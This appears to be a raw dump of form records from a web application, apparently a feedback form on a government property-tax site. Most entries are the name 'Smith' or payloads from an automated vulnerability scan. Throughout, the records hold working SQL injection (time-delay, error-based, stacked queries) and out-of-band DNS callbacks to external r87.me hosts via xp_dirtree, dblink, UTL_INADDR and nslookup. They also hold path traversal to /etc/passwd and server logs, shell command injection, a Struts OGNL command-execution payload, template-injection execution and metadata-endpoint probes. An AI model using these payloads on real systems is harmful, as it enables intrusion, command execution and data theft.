8842 Smith -1%27+and+6%3d3+or+1%3d1%2b(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+x)a)%2b%27
8843
8844 ((SELECT(1)FROM(SELECT(SLEEP(1)))A)) /* af58dc3e-f2ed-4601-a0ae-f44b47009e42 */
8845
8846
8847 Smith
8848 Smith ' UNION ALL SELECT CHAR(95)||CHAR(33)||CHAR(64)||CHAR(54)||CHAR(100)||CHAR(105)||CHAR(108)||CHAR(101)||CHAR(109)||CHAR(109)||CHAR(97) FROM INFORMATION_SCHEMA.SYSTEM_USERS-- zDyA
8849 Smith
8850 http://164.100.223.17:3306
8851 http://164.100.223.17:3306
8852
8853 1;exec('xp_dirtree ''\\tbiqvedsq6xgcmyj4lpwhalwq1lgahhtc7d4yrc9'+'tii.r87.me'+'\c$\a''')--
8854 Smith
8855 ((SELECT(1)FROM(SELECT(SLEEP(30)))A)) /* 335ef93a-191c-4c00-8be1-ef248b067e9a */
8856 -1';exec('xp_dirtree ''\\tbiqvedsq6zrji2kpy_j9ztw0yccf9rslnryxy9d'+'ev0.r87.me'+'\c$\a''')--
8857 Smith
8858 https://metadata.platformequinix.com/metadata
8859
8860 1) exec('xp_dirtree ''\\tbiqvedsq630npwcfvy_zkdzluqvymd1uhle2gpq'+'lcq.r87.me'+'\c$\a''')--
8861
8862 Smith
8863 ' AND (SELECT 1 FROM (SELECT(SLEEP(25)))A)-- 1 /* 69d7fe3d-4def-45df-967c-a7d6fc28bb55 */
8864 Smith
8865 &ping -w 25 127.0.0.1 &
8866 1) exec('xp_dirtree ''\\tbiqvedsq6mb4hssjgk8daupmtdqnd0r5gof1yj4'+'zbi.r87.me'+'\c$\a''')--
8867 ' AND (SELECT 1 FROM (SELECT(SLEEP(1)))A)-- 1 /* fcc0b016-cf8e-414e-9846-c715ab4c515c */
8868 '+((SELECT 1 FROM (SELECT SLEEP(25))A))+' /* 7a1cd18e-b8b5-494d-8dc8-da1d085ae226 */
8869
8870 /../../../../../../../../../../boot.ini
8871 1/../../../../../../../../../../boot.ini
8872 Smith
8873 https://metadata.platformequinix.com/metadata
8874 1')exec('xp_dirtree ''\\tbiqvedsq67x9sh_dsl3kkkohdthjttvpivjzmlc'+'--0.r87.me'+'\c$\a''')--
8875
8876 c:\boot.ini
8877 Smith
8878
8879
8880 '+((SELECT 1 FROM (SELECT SLEEP(25))A))+' /* a2e21d96-7b90-49da-b9cb-bac3f1563d2a */
8881 Smith
8882 Smith
8883
8884 Smith
8885 ns../../../../../../../../../../../boot.ini.........................................................
8886 1))exec('xp_dirtree ''\\tbiqvedsq6fsoxwgm3kxtqmspwlwrf_mw5wsz2jy'+'y1w.r87.me'+'\c$\a''')--
8887 %2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini
8888
8889 Smith
8890 Smith
8891 Smith
8892
8893
8894 ' AND (SELECT 1 FROM (SELECT(SLEEP(25)))A)-- 1 /* a14fbdb0-5aa8-4c97-baf5-ecc7cdefb6de */
8895 Smith
8896
8897
8898
8899
8900 -1 or 1=((SELECT 1 FROM (SELECT SLEEP(25))A)) /* 6c77f6ec-e452-4864-bd12-d73d90b474df */
8901 1'))exec('xp_dirtree ''\\tbiqvedsq64tdoqb2gws4l3dzhh6ie4s2zt6s8tf'+'z44.r87.me'+'\c$\a''')--
8902
8903
8904
8905 -1 or 1=((SELECT 1 FROM (SELECT SLEEP(1))A)) /* 2fd7351a-27af-4da7-bea3-9b44ffd31d57 */
8906 Smith
8907 N3TSP4RKE2
8908 &ping -w 25 127.0.0.1 &
8909 syscolumns WHERE 2>3;exec('xp_dirtree ''\\tbiqvedsq6v5qliikl8vn0wzej4mlherjvayoc12'+'sq4.r87.me'+'\c
8910
8911 Smith
8912
8913 Smith
8914 -1 or 1=((SELECT 1 FROM (SELECT SLEEP(1))A)) /* 8aec9d66-692d-4675-9b17-7da9211e20da */
8915 Smith
8916 Smith
8917 Smith data:;base64,JyI+PHNjcmlwdD5uZXRzcGFya2VyKDB4MDVDNTdGKTwvc2NyaXB0Pg==
8918 /../../../../../../../../../../web.config
8919 Smith '" ns=netsparker(0x05C5E9)
8920
8921
8922 -1 or 1=((SELECT 1 FROM (SELECT SLEEP(1))A)) /* 8aec9d66-692d-4675-9b17-7da9211e20da */
8923 Smith
8924 /../../../../../../../../../../windows/iis6.log
8925
8926 -1';DECLARE @q varchar(999),@r nvarchar(999)SET @q = 'SELECT * FROM OPENROWSET(''SQLOLEDB'',''@'';''
8927 /../../../../../../../../../../windows/iis6.log
8928 ping -n 25 127.0.0.1
8929
8930
8931 ping -w 25 127.0.0.1
8932 -1" or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))+" /* 025a3e73-cc54-45d5-92d8-b2bb7a4f2490 */
8933 /../../../../../../../../../../etc/httpd/logs/error.log
8934 -1';DECLARE @q varchar(999),@r nvarchar(999)SET @q = 'SELECT * FROM OPENROWSET(''SQLOLEDB'',''@'';''
8935 Smith 1 ns=netsparker(0x05CCA1)
8936 /../../../../../../../../../../proc/self/fd/2.php
8937 /../../../../../../../../../../etc/httpd/logs/error.log
8938 -1" or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))+" /* 93ab4087-7090-4696-85cf-85b36ada132e */
8939 Smith
8940 ping -w 25 127.0.0.1
8941 Smith
8942
8943 Smith
8944 dblink_connect('host=tbiqvedsq6ht8dsl1tzyznmlse4p4bz0g-4ucaon'||'3xi.r87.me user=a password=a connec
8945 ') AND (SELECT 1 FROM (SELECT(SLEEP(25)))A)-- 1 /* a9e884c8-e01f-48cb-b5fe-aad141b5be11 */
8946
8947 /../../../../../../../../../../var/log/apache2/error.log
8948 Smith
8949 Smith
8950
8951 ' AND (SELECT 1 FROM (SELECT(SLEEP(25)))A)-- 1 /* cf25d967-16fc-40ea-b813-a875b76209ab */
8952 ping -w 1 127.0.0.1
8953 dblink_connect('host=tbiqvedsq6gk7b4upojcye7yw3ijzxls6pgtbvuo'||'m8q.r87.me user=a password=a connec
8954 cast((SELECT dblink_connect('host=tbiqvedsq6mxqhqcabg8kzzocirkl28teri6gese'||'elc.r87.me user=a pass
8955 Smith
8956 Smith
8957 Smith
8958 Smith
8959 netsparker(0x05DA3F)
8960
8961 \';netsparker(0x05D906);///
8962 Smith
8963 |ping -n 25 127.0.0.1
8964 'XOR(if(now()=sysdate(),sleep(25),0))XOR'NS /* 6e5026e7-79d2-4796-a20a-58f7bf4e7336 */
8965 Smith
8966 'XOR(if(now()=sysdate(),sleep(1),0))XOR'NS /* 7af9c2ce-1cb3-490e-a96e-f672fb75a5a7 */
8967 cast((SELECT dblink_connect('host=tbiqvedsq6bjzz4uyq5gtcsty_wohqbeq3uis_x9'||'qom.r87.me user=a pass
8968
8969
8970 Smith
8971 Smith
8972 'XOR(if(now()=sysdate(),sleep(1),0))XOR'NS /* 7f80df1f-a97f-4f80-b83a-0198cb2da815 */
8973 Smith
8974
8975
8976 '||(SELECT dblink_connect('host=tbiqvedsq6lapuo4wiufh3x1kn0xfoft9ruaabxd'||'yd8.r87.me user=a passwo
8977 Smith
8978 /../../../../../../../../../../proc/version.php
8979
8980 Smith
8981 'XOR(if(now()=sysdate(),sleep(30),0))XOR'NS /* dd82373a-0b2d-4210-8dd3-11ab2b74a5c7 */
8982 /../../../../../../../../../../../etc/passwd
8983
8984 /../../../../../../../../../../boot.ini
8985
8986 '||(SELECT dblink_connect('host=tbiqvedsq6efckfrmzisbriu_cqtip8x0abwpliz'||'sle.r87.me user=a passwo
8987
8988 Smith
8989 Smith
8990
8991
8992 'XOR(if(now()=sysdate(),sleep(30),0))XOR'NS /* dd82373a-0b2d-4210-8dd3-11ab2b74a5c7 */
8993
8994 Smith c:\boot.ini
8995 Smith
8996
8997
8998 'XOR(if(now()=sysdate(),sleep(25),0))XOR'NS /* c9b77173-c128-40da-be2a-d9f57358d940 */
8999 Smith
9000 (select UTL_INADDR.GET_HOST_ADDRESS('tbiqvedsq6kmgiuhp-stgcar1k_skbagsnv7opel'||'bgk.r87.me') from D
9001 /../../../../../../../../../../boot.ini.aspx
9002 Smith
9003
9004
9005
9006 Smith
9007 (length(CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS('tbiqvedsq6_y_s68z1qdemvg3aggu74m
9008 Smith +gethostbyname(trim('tbiqvedsq6ccxa67o5yq4--ke0e64oqlwi_8nvyv'.'los.r87.me'));//
9009 Smith file:///boot.ini
9010 +gethostbyname(trim('tbiqvedsq6viezxuduj6ay6fdqkf2xmvmccexm4g'.'y98.r87.me'));//
9011
9012 %2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini
9013 Smith
9014 Smith
9015 Smith
9016 Smith ns../../../../../../../../../../../boot.ini.......................................................................................................................................................................................
9017
9018 '||CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS('tbiqvedsq6yjgquapwmiza1jrbfu3ksc8ij2z
9019 %2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini
9020 ....//....//....//....//....//....//....//....//....//....//....//etc/passwd
9021 Smith file%3a%2f%2f%2fboot.ini
9022
9023
9024 ...//...//...//...//...//...//...//...//...//...//...//etc/passwd
9025 . . /. . /. . /. . /. . /. . /. . /. . /. . /. . /. . /etc/passwd
9026 c%3a%5cboot.ini
9027 Smith
9028
9029 Smith
9030 (select UTL_INADDR.GET_HOST_ADDRESS(chr(116)||chr(98)||chr(105)||chr(113)||chr(118)||chr(101)||chr(1
9031
9032 Smith /../../../../../../../../../../windows/win.ini
9033 (length(CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS(chr(116)||chr(98)||chr(105)||chr(
9034 Smith
9035 /../../../../../../../../../../windows/win.ini
9036 Smith '+gethostbyname(lc 'tbiqvedsq6nkmgc1airtbhrnspajq1emqxfrfjpl'.'ozm.r87.me')+'
9037 /../../../../../../../../../../var/log/nginx/access.log
9038 Smith
9039 /../../../../../../../../../../var/log/nginx/access.log
9040 Smith
9041 Smith /../../../../../../../../../../windows/win.ini
9042 '+gethostbyname(lc 'tbiqvedsq64z1zutwanhdxb4rhodvydiicroimct'.'mvc.r87.me')+'
9043
9044
9045 Smith
9046 Smith
9047 Smith
9048 Smith
9049 Smith
9050 Smith
9051 (length(CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS(chr(116)||chr(98)||chr(105)||chr(
9052 Smith
9053 Smith nslookup tbiqvedsq6w_y9qdvd8c1fg5babhanvay0lv9yof^-zu.r87.me&'\"`0&nslookup tbiqvedsq6w_y9qdvd8c1fg5babhanvay0lv9yof^-zu.r87.me&`'
9054
9055 Smith
9056 '||CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS(chr(116)||chr(98)||chr(105)||chr(113)|
9057
9058 Smith
9059 file:///windows/win.ini
9060
9061
9062 Smith
9063 Smith '& nslookup tbiqvedsq6s3fikd1eooawo7wqckn_-n9gire0w9^cpe.r87.me&'\"`0&nslookup tbiqvedsq6s3fikd1eooawo7wqckn_-n9gire0w9^cpe.r87.me&`'
9064 Smith "& nslookup tbiqvedsq6bjy1qxh_evixygig2-d4nosbwlthh1^-pq.r87.me&'\"`0&nslookup tbiqvedsq6bjy1qxh_evixygig2-d4nosbwlthh1^-pq.r87.me&`'
9065
9066
9067 ....//....//....//....//....//....//....//....//....//....//....//windows/win.ini
9068 Smith c:\windows\win.ini
9069 Smith
9070 nslookup "tbiqvedsq67dm2tov49jobeomhthvmr_axtohdx8""5tm.r87.me"
9071
9072
9073
9074 Smith
9075 Smith
9076
9077
9078
9079
9080 Smith
9081 Smith file:///windows/win.ini
9082 /../../../../../../../../../../windows/win.ini.php
9083 Smith [::1]/trace.axd
9084 ....//....//....//....//....//....//....//....//....//....//....//windows/win.ini
9085
9086 Smith ....//....//....//....//....//....//....//....//....//....//....//windows/win.ini
9087 /../../../../../../../../../../proc/self/fd/2.aspx
9088 Smith /../../../../../../../../../../proc/self/fd/2
9089 https://propertytax.jk.gov.in/elmah.axd
9090
9091 Smith %{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='nslookup "tbiqvedsq60yotczqknoxeql99sfouklz7s9fzzb"ggm.r87.me"').(#p=new java.lang.ProcessBuilder({'cmd.exe','/c',#cmd})).(#p.redire
9092
9093 164.100.223.17/elmah.axd
9094 Smith
9095 Smith
9096 Smith /../../../../../../../../../../proc/version.aspx
9097
9098 Smith .....///.....///.....///.....///.....///.....///.....///.....///.....///.....///.....///windows/win.ini
9099
9100
9101 [::1]/elmah.axd
9102
9103
9104 Smith <#assign ex="freemarker.template.utility.Execute"?new()>${ ex("cmd.exe /c nslookup tbiqvedsq6dkqygxbfomyuny9a9yq5ufxyudbqat"+"d6a.r87.me") }
9105
9106 require 'resolv';Resolv.getaddress ("tbiqvedsq6d26oj6uqnxvqafepytvilbheubcr3m".concat "rhy.r87.me")
9107 Smith propertytax.jk.gov.in/elmah
9108
9109 Smith /../../../../../../../../../../../etc/passwd
9110 /../../../../../../../../../../../etc/passwd
9111
9112
9113 Smith /../../../../../../../../../../var/log/apache/error.log
9114 Smith require('dns').lookup('tbiqvedsq6iueqhyguugwnje-xr8rgzzovts7_id'.concat('fi8.r87.me'),_=>_)
9115
9116
9117 Smith
9118 Smith
9119 /../../../../../../../../../../../etc/passwd.aspx
9120 Smith
9121
9122
9123 ....//....//....//....//....//....//....//....//....//....//....//etc/passwd
9124
9125 Smith
9126 Smith
9127
9128 Smith /../../../../../../../../../../../etc/passwd
9129 Smith
9130
9131 Smith
9132
9133
9134
9135 Smith
9136
9137 Smith
9138
9139 Smith
9140 Smith faq.aspx
9141 Smith
9142
9143 faq.aspx
9144 & ping -n 25 127.0.0.1 &
9145
9146 Smith
9147 Smith '& ping -n 25 127.0.0.1 &
9148 & ping -n 1 127.0.0.1 &
9149 Smith
9150
9151 & ping -n 1 127.0.0.1 &
9152
9153
9154 & ping -n 1 127.0.0.1 &
9155
9156 Smith
9157
9158 Smith
9159
9160 '&ping -w 1 127.0.0.1 &'
9161
9162 Smith
9163 Smith "&ping -w 25 127.0.0.1 &"
9164 Smith
9165 '&ping -w 1 127.0.0.1 &'
9166 Smith
9167 Smith '&ping -w 25 127.0.0.1 &'
9168 Smith '&ping -w 1 127.0.0.1 &'
9169 Smith '&ping -w 1 127.0.0.1 &'
9170 Smith '&ping -w 30 127.0.0.1 &'
9171 Smith '&ping -w 30 127.0.0.1 &'
9172
9173
9174 Smith
9175 faq.aspx
9176
9177
9178 &ping -w 25 127.0.0.1 &
9179
9180 Smith &ping -w 25 127.0.0.1 &
9181
9182 Smith &ping -w 1 127.0.0.1 &
9183 Smith &ping -w 1 127.0.0.1 &
9184
9185 Smith
9186 Smith
9187 Smith
9188 Smith
9189 Smith
9190 Smith
9191 Smith
9192 ping -w 25 127.0.0.1 &
9193 ping -w 1 127.0.0.1 &
9194 ping -w 1 127.0.0.1 &
9195 ping -w 30 127.0.0.1 &
9196 ping -w 30 127.0.0.1 &
9197
9198 Smith faq.aspx
9199
9200
9201
9202 Smith
9203 Smith ping -w 25 127.0.0.1 &
9204
9205 Smith ping -w 1 127.0.0.1 &
9206
9207 Smith ping -w 1 127.0.0.1 &
9208 Smith ping -w 30 127.0.0.1 &
9209 Smith ping -w 30 127.0.0.1 &
9210 /feedbackform.aspx/etc/faq.aspx
9211
9212
9213 ping -n 25 127.0.0.1
9214 Smith
9215 ping -n 1 127.0.0.1
9216 ping -n 1 127.0.0.1
9217 Smith
9218
9219
9220
9221
9222
9223
9224 Smith
9225 Smith ping -n 25 127.0.0.1
9226 Smith ping -n 1 127.0.0.1
9227 Smith ping -n 1 127.0.0.1
9228 Smith ping -n 30 127.0.0.1
9229 Smith ping -n 30 127.0.0.1
9230 Smith
9231 Smith /feedbackform.aspx/etc/faq.aspx
9232 Smith
9233
9234 Smith
9235 ping -w 25 127.0.0.1
9236 Smith
9237 ping -w 1 127.0.0.1
9238 Smith
9239 ping -w 1 127.0.0.1
9240 ping -w 30 127.0.0.1
9241 Smith
9242 ping -w 30 127.0.0.1
9243 Smith
9244
9245 Smith
9246 /etc/faq.aspx
9247 Smith
9248 Smith
9249 Smith
9250
9251
9252 Smith ping -w 25 127.0.0.1
9253
9254 Smith ping -w 1 127.0.0.1
9255 Smith ping -w 1 127.0.0.1
9256 Smith /etc/faq.aspx
9257
9258
9259
9260 |ping -n 25 127.0.0.1
9261 Smith
9262
9263 Smith |ping -n 25 127.0.0.1
9264 Smith
9265 Smith
9266
9267 Smith |ping -n 1 127.0.0.1
9268 Smith
9269 Smith |ping -n 1 127.0.0.1
9270 Smith |ping -n 30 127.0.0.1
9271 Smith |ping -n 30 127.0.0.1
9272 Smith
9273 WEB-INF/web.xml
9274
9275 Smith
9276
9277
9278
9279
9280 |sleep 25
9281
9282 Smith WEB-INF/web.xml
9283 Smith
9284 Smith |sleep 25
9285
9286 Smith
9287
9288
9289
9290
9291 Smith
9292
9293
9294
9295
9296
9297 /../../../../../../../../../../WEB-INF/web.xml
9298 Smith /../../../../../../../../../../WEB-INF/web.xml
9299 Smith
9300 Smith
9301
9302 Smith
9303 /../../../../../../../../../../var/log/apache2/access.log
9304
9305
9306 Smith
9307 Smith
9308 Smith /../../../../../../../../../../var/log/apache2/access.log
9309
9310
9311
9312
9313 Smith
9314 Smith
9315 Smith
9316 Smith
9317 Smith
9318
9319 /../../../../../../../../../../etc/httpd/logs/access.log
9320
9321
9322
9323
9324 Smith
9325 Smith
9326 Smith
9327 Smith
9328
9329
9330 Smith
9331 Smith
9332 Smith
9333 Smith
9334 Smith
9335 Smith
9336 Smith /../../../../../../../../../../etc/httpd/logs/access.log
9337 Smith
9338
9339
9340
9341
9342
9343
9344
9345
9346
9347 Smith
9348
9349
9350
9351 Smith
9352 Smith
9353 Smith
9354
9355
9356 Smith
9357 Smith
9358 /../../../../../../../../../../var/log/nginx/access.log
9359 ' WAITFOR DELAY '0:0:25'-- /* 1c54e34c-31b2-4a97-a910-28d629212b15 */
9360
9361
9362 Smith ' WAITFOR DELAY '0:0:25'-- /* edcd22a1-e257-4aa9-a284-a9bb050783da */
9363 Smith
9364
9365 Smith
9366 1 WAITFOR DELAY '0:0:25'-- /* 84376ffb-7424-4b28-b04d-25b8811aa859 */
9367 Smith /../../../../../../../../../../var/log/nginx/access.log
9368 Smith 1 WAITFOR DELAY '0:0:25'-- /* c114a647-2543-4dd0-820c-06b0a7e77e95 */
9369 ' WAITFOR DELAY '0:0:25'-- /* 955e76f5-29e1-4cfc-9be1-f1d2360a0db5 */
9370 Smith 1 WAITFOR DELAY '0:0:1'-- /* 20360c66-00bb-4d99-8ce8-a78875690d9e */
9371 ' WAITFOR DELAY '0:0:1'-- /* 3df8a29f-6585-4017-9be9-d6e48ed89ff6 */
9372 ' WAITFOR DELAY '0:0:1'-- /* 1a631b52-50b4-4360-971c-0714509ad077 */
9373 ' WAITFOR DELAY '0:0:30'-- /* f2240243-73f3-45a5-9500-e4e1edc0533a */
9374 ' WAITFOR DELAY '0:0:1'-- /* 3df8a29f-6585-4017-9be9-d6e48ed89ff6 */
9375 Smith 1 WAITFOR DELAY '0:0:1'-- /* f214ce17-1857-4b6f-b7dd-59351f7233e8 */
9376 ' WAITFOR DELAY '0:0:30'-- /* 71572799-869d-4e62-b0a4-115b08b83117 */
9377 Smith
9378
9379 ' WAITFOR DELAY '0:0:30'-- /* 71572799-869d-4e62-b0a4-115b08b83117 */
9380
9381 ' WAITFOR DELAY '0:0:25'-- /* 92298363-ae20-4bfa-9548-164f7262030a */
9382 ' WAITFOR DELAY '0:0:1'-- /* 11c8c283-e45c-4792-b5f1-8fc1881a0dac */
9383 ' WAITFOR DELAY '0:0:1'-- /* acb5ba9b-cfb4-42ca-b94b-57cd31157ec5 */
9384 Smith
9385 ' WAITFOR DELAY '0:0:30'-- /* b41a8f62-9a85-4ec5-8958-4f0b4029edd8 */
9386 ' WAITFOR DELAY '0:0:30'-- /* 1e48c98f-c485-449d-a8e0-baf82244fd7d */
9387
9388 Smith
9389 1 WAITFOR DELAY '0:0:25'-- /* 3c69579e-4e0c-49b3-b086-a5155b40be76 */
9390 WAITFOR DELAY '0:0:25'-- /* 021e77b2-77e5-4b99-996a-cbd2fccb29ff */
9391 WAITFOR DELAY '0:0:1'-- /* 74890780-79d8-4794-8726-b7375825d813 */
9392 WAITFOR DELAY '0:0:1'-- /* b4be74c3-b484-467f-aa1c-69376efbb1c8 */
9393 /../../../../../../../../../../opt/lampp/logs/access_log
9394 1 WAITFOR DELAY '0:0:25'-- /* 70297c79-dd83-449e-93b7-f8101270c7a4 */
9395 WAITFOR DELAY '0:0:25'-- /* 7e263bfa-2316-4736-815b-775d5c8e25b7 */
9396 Smith WAITFOR DELAY '0:0:25'-- /* 1814cf45-4fb8-4799-a7fd-c3dd26883a87 */
9397 /../../../../../../../../../../var/log/lighttpd/access.log
9398 Smith /../../../../../../../../../../opt/lampp/logs/access_log
9399
9400 WAITFOR DELAY '0:0:25'-- /* 2d2453c4-b7c7-4761-81c2-20db5ae439fb */
9401 Smith /../../../../../../../../../../var/log/lighttpd/access.log
9402 1) WAITFOR DELAY '0:0:25'-- /* 5d6e813c-1a3e-4200-b715-f1f52a097a3f */
9403 1) WAITFOR DELAY '0:0:1'-- /* e8532831-3b06-4298-9b8d-bfad3b40d1ca */
9404 1) WAITFOR DELAY '0:0:1'-- /* b1a37e07-3292-4939-b2a1-01f3bb372ba6 */
9405 1) WAITFOR DELAY '0:0:30'-- /* 5365b364-1001-4bc6-8e9b-fde18026865a */
9406 Smith
9407 1) WAITFOR DELAY '0:0:25'-- /* 2fc0c4cd-7736-4363-aab0-b48bb7547283 */
9408 1) WAITFOR DELAY '0:0:30'-- /* 5365b364-1001-4bc6-8e9b-fde18026865a */
9409 1) WAITFOR DELAY '0:0:30'-- /* 03dba204-52d3-40c2-9586-13ed07fcbfa6 */
9410 1) WAITFOR DELAY '0:0:25'-- /* 4f46cb74-9715-4f53-8ddf-967e6a033eb0 */
9411 Smith 1) WAITFOR DELAY '0:0:25'-- /* 7f035a6e-26a0-4888-ac09-f1eef00c8767 */
9412
9413 /../../../../../../../../../../AppServ/Apache24/logs/access.log
9414 Smith /../../../../../../../../../../AppServ/Apache24/logs/access.log
9415 ') WAITFOR DELAY '0:0:25'-- /* f5de36cb-9f91-42cd-a110-c594b01eed17 */
9416 Smith
9417
9418 ') WAITFOR DELAY '0:0:1'-- /* df687f9e-ad0e-4d34-b655-0ff19696d407 */
9419 ') WAITFOR DELAY '0:0:25'-- /* 20ed3c25-e096-4951-bcd4-55d52534fce7 */
9420 ') WAITFOR DELAY '0:0:1'-- /* 8f5e3db2-f70f-4296-a9d9-018324b934df */
9421 ') WAITFOR DELAY '0:0:1'-- /* 92221640-8390-4e87-9378-47dade545f10 */
9422 ') WAITFOR DELAY '0:0:1'-- /* d95c36e6-346a-4946-a3a4-60a5cf78c1f3 */
9423 ') WAITFOR DELAY '0:0:30'-- /* 1acf6e2b-e168-4599-b588-15ae48d75044 */
9424 ') WAITFOR DELAY '0:0:30'-- /* 50d0c0eb-3ade-4af4-8c16-e90738c2d595 */
9425 Smith ') WAITFOR DELAY '0:0:25'-- /* 32357fe9-0f32-4793-aa11-96e9697a6e29 */
9426 ') WAITFOR DELAY '0:0:25'-- /* 1c8c532a-2016-460c-b31c-cb59748ea15f */
9427 Smith
9428
9429 Smith
9430
9431 Smith
9432 ')) WAITFOR DELAY '0:0:25'-- /* 04d38bb4-9e8f-4efc-8e14-542d9f125f26 */
9433 ../../../../../../../../../../xampp/apache/logs/access.log
9434 ')) WAITFOR DELAY '0:0:25'-- /* f81a5934-c2d7-40bb-8f9c-b14f78784408 */
9435 ')) WAITFOR DELAY '0:0:1'-- /* a7a8ee3d-0783-49fa-a82e-13acadd5628e */
9436 ')) WAITFOR DELAY '0:0:1'-- /* 6d375774-4684-4889-a437-c0f3230e14b9 */
9437 ')) WAITFOR DELAY '0:0:30'-- /* dee5f078-68d8-45c5-8ff6-6638cf97a609 */
9438 ')) WAITFOR DELAY '0:0:25'-- /* 68e9a1b2-8400-41e9-a3a8-ba8b94a9eb1f */
9439 ')) WAITFOR DELAY '0:0:30'-- /* 7bab70c2-1023-438c-a49b-00b23cd96bd0 */
9440
9441 Smith /../../../../../../../../../../var/log/apache/access.log
9442 /../../../../../../../../../../var/log/apache/access.log
9443 1)) WAITFOR DELAY '0:0:25'-- /* 58b8fe59-9d36-4bcf-b51d-214e31d6d6dd */
9444 1)) WAITFOR DELAY '0:0:25'-- /* 3ebceb4f-20b7-4c65-8594-66eafa20df85 */
9445 Smith
9446 Smith ')) WAITFOR DELAY '0:0:25'-- /* 7ca8d085-410f-4f63-a960-5bde6426b15d */
9447 1));DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR
9448 1)) WAITFOR DELAY '0:0:25'-- /* d74b2dc2-c5d8-4fab-9833-e1a231fffb3b */
9449 1)) WAITFOR DELAY '0:0:1'-- /* 092addf8-c304-46bd-b9d1-f988beaba507 */
9450
9451 1)) WAITFOR DELAY '0:0:1'-- /* 799b79a3-3c0c-4660-a72a-16d1de1fb9f0 */
9452 1)) WAITFOR DELAY '0:0:30'-- /* 54062b0e-93dc-4b07-b94c-a21210e2c4fc */
9453 1)) WAITFOR DELAY '0:0:30'-- /* 5b085826-5e77-4803-8c62-91b2ffd9a54e */
9454 1));DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR
9455 1));DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(49);WAITFOR/**/DELAY
9456 1));DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(49);WAITFOR/**/DELAY
9457 1));DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(49);WAITFOR/**/DELAY
9458 1));DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(49);WAITFOR/**/DELAY
9459 Smith 1)) WAITFOR DELAY '0:0:25'-- /* 1c3ddd5e-acd2-48c5-bc0d-3f7faec6560c */
9460 Smith 1)) WAITFOR DELAY '0:0:1'-- /* ee01cb6e-06a2-4d70-8cc4-64a3ff6aead4 */
9461 Smith 1)) WAITFOR DELAY '0:0:1'-- /* 5cdd5433-6c3e-4dd2-83f7-4d7c1a284bcf */
9462 1;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/*
9463 1));DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x-- /* ed7258df-ad2a-4684-bb33-22f6283ea2cc */
9464 Smith
9465 1;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(49);WAITFOR/**/DELAY/*
9466 1;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(49);WAITFOR/**/DELAY/*
9467 1;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(51)+char(48);WAITFOR/*
9468 1;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(51)+char(48);WAITFOR/*
9469 1;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/*
9470 1;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(49);WAITFOR/**/DELAY/*
9471 1;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(49);WAITFOR/**/DELAY/*
9472 Smith 1));DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x-- /* 04a07926-988b-4143-b543-a6b5dc766957 */
9473 Smith
9474
9475 1;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x-- /* 5fd30101-79b4-40c7-8463-ed2ee4c0d8a6 */
9476 1);DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/
9477 1);DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/
9478 1);DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(49);WAITFOR/**/DELAY/
9479 1);DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(49);WAITFOR/**/DELAY/
